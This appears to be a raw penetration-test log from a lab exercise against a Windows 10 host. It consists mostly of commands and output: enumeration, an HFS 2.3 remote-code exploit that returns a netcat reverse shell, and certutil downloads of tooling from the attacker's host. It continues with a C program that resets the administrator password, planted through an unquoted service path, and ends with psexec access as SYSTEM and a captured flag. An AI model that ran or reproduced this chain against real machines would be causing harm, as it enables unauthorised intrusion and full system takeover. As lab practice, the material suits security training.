nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.27
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 23:00 EST
Stats: 0:01:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 45.45% done; ETC: 23:02 (0:00:59 remaining)
Nmap scan report for 10.11.1.27
Host is up (0.022s latency).
Not shown: 59536 closed tcp ports (reset), 5988 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows 10 Enterprise Evaluation 14393 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: AARON
|   NetBIOS_Domain_Name: AARON
|   NetBIOS_Computer_Name: AARON
|   DNS_Domain_Name: Aaron
|   DNS_Computer_Name: Aaron
|   Product_Version: 10.0.14393
|_  System_Time: 2025-02-11T04:01:50+00:00
|_ssl-date: 2025-02-11T04:01:59+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=Aaron
| Not valid before: 2025-02-10T02:59:38
|_Not valid after:  2025-08-12T02:59:38
8080/tcp  open  http          HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/10%OT=135%CT=1%CU=31355%PV=Y%DS=2%DC=I%G=Y%TM=67A
OS:ACBB5%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=I%TS=A)SEQ(SP=10
OS:3%GCD=3%ISR=10B%TI=I%TS=A)OPS(O1=M5B4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NN
OS:T11%O4=M5B4NW8ST11%O5=M5B4NW8ST11%O6=M5B4ST11)WIN(W1=2000%W2=2000%W3=200
OS:0%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M5B4NW8NNS%CC=N%Q=)
OS:T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)
 
Network Distance: 2 hops
Service Info: Host: AARON; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-time: 
|   date: 2025-02-11T04:01:50
|_  start_date: 2025-02-11T02:59:39
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h36m02s, deviation: 3h34m40s, median: 1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 10 Enterprise Evaluation 14393 (Windows 10 Enterprise Evaluation 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Aaron
|   NetBIOS computer name: AARON\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-02-10T20:01:52-08:00
 
TRACEROUTE
HOP RTT      ADDRESS
1   21.94 ms 10.11.1.27
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.53 seconds

rpcclient -U "" 10.11.1.27
Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

samrdump.py 10.11.1.27                         
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Retrieving endpoint list from 10.11.1.27
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[*] No entries received.

445/tcp   open  microsoft-ds  Windows 10 Enterprise Evaluation 14393 microsoft-ds (workgroup: WORKGROUP)

smbclient -N -L \\\\10.11.1.27
session setup failed: NT_STATUS_ACCESS_DENIED
 
smbclient -N -L \\\\10.11.1.27 -U 'Guest'
session setup failed: NT_STATUS_LOGON_FAILURE

8080/tcp  open  http          HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3

python3 -m http.server 8000

python2 39161.py 10.11.1.27 8080 

nc -lnvp 80
listening on [any] 80 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.27] 49725
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
 
C:\Users\Aaron\Desktop>whoami
whoami
aaron\aaron

C:\Users\Aaron>whoami /priv
whoami /priv
 
PRIVILEGES INFORMATION
----------------------
 
Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
 
C:\Users\Aaron>systeminfo
systeminfo
 
Host Name:                 AARON
OS Name:                   Microsoft Windows 10 Enterprise Evaluation
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00329-20000-00001-AA589
Original Install Date:     10/15/2016, 8:10:27 PM
System Boot Time:          2/10/2025, 8:13:11 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2195 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,485 MB
Virtual Memory: Max Size:  3,199 MB
Virtual Memory: Available: 2,539 MB
Virtual Memory: In Use:    660 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\AARON
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.11.1.27
                                 [02]: fe80::8d62:50ab:edf2:4711
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

certutil.exe -f -urlcache -split http://172.16.1.1:8000/winPEASx64.exe winPEASx64.exe

����������͹ Interesting Services -non Microsoft-
� Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services
    VGAuthService(VMware, Inc. - VMware Alias Manager and Ticket Service)["C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"] - Auto - Running
    Alias Manager and Ticket Service
   =================================================================================================
 
    VMTools(VMware, Inc. - VMware Tools)["C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"] - Auto - Running
    Provides support for synchronizing objects between the host and guest operating systems.
   =================================================================================================
 
    WiseBootAssistant(WiseCleaner.com - Wise Boot Assistant)[C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe] - Auto - Running - No quotes and Space detected
    File Permissions: Users [WriteData/CreateFiles]
    Possible DLL Hijacking in binary folder: C:\Program Files (x86)\Wise\Wise Care 365 (Users [WriteData/CreateFiles])
    In order to optimize system performance,Wise Care 365 will calculate your system startup time.
   =================================================================================================

certutil.exe -f -urlcache -split http://172.16.1.1:8000/SharpUp.exe SharpUp.exe

C:\Users\Aaron>.\SharpUp.exe audit
.\SharpUp.exe audit
 
=== SharpUp: Running Privilege Escalation Checks ===
[!] Modifialbe scheduled tasks were not evaluated due to permissions.
Registry AutoLogon Found
 
[+] Hijackable DLL: C:\Users\Aaron\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\FileSyncShell64.dll
[+] Associated Process is explorer with PID 3124 
[+] Hijackable DLL: C:\Users\Aaron\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\MSVCP120.dll
[+] Associated Process is explorer with PID 3124 
[+] Hijackable DLL: C:\Users\Aaron\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\MSVCR120.dll
[+] Associated Process is explorer with PID 3124 
[+] Hijackable DLL: C:\Users\Aaron\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\ClientTelemetry.dll
[+] Associated Process is explorer with PID 3124 
 
=== Registry AutoLogons ===
	DefaultDomainName: AARON
	DefaultUserName: Aaron
	DefaultPassword: 
	AltDefaultDomainName: 
	AltDefaultUserName: 
	AltDefaultPassword: 
 
 
=== Services with Unquoted Paths ===
	Service 'WiseBootAssistant' (StartMode: Automatic) has executable 'C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe', but 'C:\Program Files (x86)\Wise\Wise' is modifable.
	Service 'WiseBootAssistant' (StartMode: Automatic) has executable 'C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe', but 'C:\Program Files (x86)\Wise\Wise Care' is modifable.
 
 
=== Modifiable Service Binaries ===
	Service 'WiseBootAssistant' (State: Running, StartMode: Auto) : C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe
 
[*] Completed Privesc Checks in 2 seconds

C:\Users\Aaron\Desktop>sc qc WiseBootAssistant
sc qc WiseBootAssistant
[SC] QueryServiceConfig SUCCESS
 
SERVICE_NAME: WiseBootAssistant
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : Wise Boot Assistant
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem

certutil.exe -f -urlcache -split http://172.16.1.1:8000/accesschk.exe accesschk.exe

C:\Users\Aaron\Desktop>.\accesschk.exe /accepteula -uwdq C:\
.\accesschk.exe /accepteula -uwdq C:\
 
Accesschk v6.13 - Reports effective permissions for securable objects
Copyright � 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com
 
C:\
  RW BUILTIN\Administrators
  RW NT AUTHORITY\SYSTEM
   W NT AUTHORITY\Authenticated Users
  RW NT SERVICE\TrustedInstaller

C:\Users\Aaron\Desktop>.\accesschk.exe /accepteula -uwdq "C:\Program Files (x86)"
.\accesschk.exe /accepteula -uwdq "C:\Program Files (x86)"
 
Accesschk v6.13 - Reports effective permissions for securable objects
Copyright � 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com
 
C:\Program Files (x86)
  RW NT SERVICE\TrustedInstaller
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators

C:\Users\Aaron\Desktop>.\accesschk.exe /accepteula -uwdq "C:\Program Files (x86)\Wise"
.\accesschk.exe /accepteula -uwdq "C:\Program Files (x86)\Wise"
 
Accesschk v6.13 - Reports effective permissions for securable objects
Copyright � 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com
 
C:\Program Files (x86)\Wise
  RW BUILTIN\Users
  RW NT SERVICE\TrustedInstaller
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators

#include <stdlib.h>
 
int main ()
{
  int i;
  
  i = system ("net user administrator Password123");
  
  return 0;
}

x86_64-w64-mingw32-gcc Wise.c -o Wise.exe

certutil.exe -f -urlcache -split http://172.16.1.2:8000/Wise.exe Wise.exe

cd "C:\Program Files (x86)\Wise"

C:\Program Files (x86)\Wise>copy C:\users\aaron\Wise.exe .\
copy C:\users\aaron\Wise.exe .\
        1 file(s) copied.

shutdown /r /t 0

nxc smb 10.11.1.27 -u administrator -p 'Password123' --local-auth
SMB         10.11.1.27      445    AARON            [*] Windows 10 Enterprise Evaluation 14393 x64 (name:AARON) (domain:AARON) (signing:False) (SMBv1:True)
SMB         10.11.1.27      445    AARON            [+] AARON\administrator:Password123 (Pwn3d!)

impacket-psexec administrator:'Password123'@10.11.1.27
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Requesting shares on 10.11.1.27.....
[*] Found writable share ADMIN$
[*] Uploading file TjYnMxrV.exe
[*] Opening SVCManager on 10.11.1.27.....
[*] Creating service pAxK on 10.11.1.27.....
[*] Starting service pAxK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> type C:\users\administrator\desktop\key.txt
ibvsojxhcqkvdwvvezvi
C:\Windows\system32> date
The current date is: Tue 02/11/2025